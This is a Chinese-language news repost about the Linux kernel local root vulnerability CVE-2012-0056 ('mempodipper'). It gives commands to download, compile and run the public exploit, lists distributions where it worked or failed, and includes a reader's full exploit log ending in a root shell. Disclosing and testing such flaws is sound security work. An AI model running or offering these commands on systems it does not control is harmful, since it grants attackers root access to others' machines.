Linux 2.6.39 到 3.2.0 爆提权漏洞

fmms 13年前
     Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。    <p> </p>    <p>重现方法:</p>    <p>wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c</p>    <p>cc mempodipper.c</p>    <p>./a.out</p>    <p> </p>    <p>在执行完毕后运行 whoami 来看是否执行成功。</p>    <p> </p>    <p>已知发行版情况:</p>    <ul>     <li>Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。<a href="/misc/goto?guid=4958326820695920612">Debian Security Tracker Report</a></li>     <li>Fedora 16: 失败。内核 3.2.1-3.fc16.x86_64</li>     <li>Arch Linux: 失败。内核 3.2.2-1-ARCH</li>    </ul>    <p>如果你测试了,请将测试结果告诉我们!注意告诉我们发行版和 uname -a 的结果。</p>    <p> </p>    <p>我机子上测试成功了</p>    <p>===============================<br /> =          Mempodipper        =<br /> =           by zx2c4          =<br /> =         Jan 21, 2012        =<br /> ===============================<br /> <br /> [+] Ptracing su to find next instruction without reading binary.<br /> [+] Creating ptrace pipe.<br /> [+] Forking ptrace child.<br /> [+] Waiting for ptraced child to give output on syscalls.<br /> [+] Ptrace_traceme'ing process.<br /> [+] Error message written. Single stepping to find address.<br /> [+] Resolved call address to 0x401ce8.<br /> [+] Opening socketpair.<br /> [+] Waiting for transferred fd in parent.<br /> [+] Executing child from child fork.<br /> [+] Opening parent mem /proc/20553/mem in child.<br /> [+] Sending fd 6 to parent.<br /> [+] Received fd at 6.<br /> [+] Assigning fd 6 to stderr.<br /> [+] Calculating su padding.<br /> [+] Seeking to offset 0x401cdc.<br /> [+] Executing su with shellcode.<br /> # whoami<br /> root</p>    <p>Ubuntu11.10</p>    <p>Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux<br /> <br /> 本文转载自: <a href="/misc/goto?guid=4958326821492014519" rel="nofollow" target="_blank">http://www.linuxeden.com/html/news/20120129/119663.html</a> <br /> <span id="attention_it2"><a style="color:#3e62a6;" href="/misc/goto?guid=4958326822280328252"></a></span></p>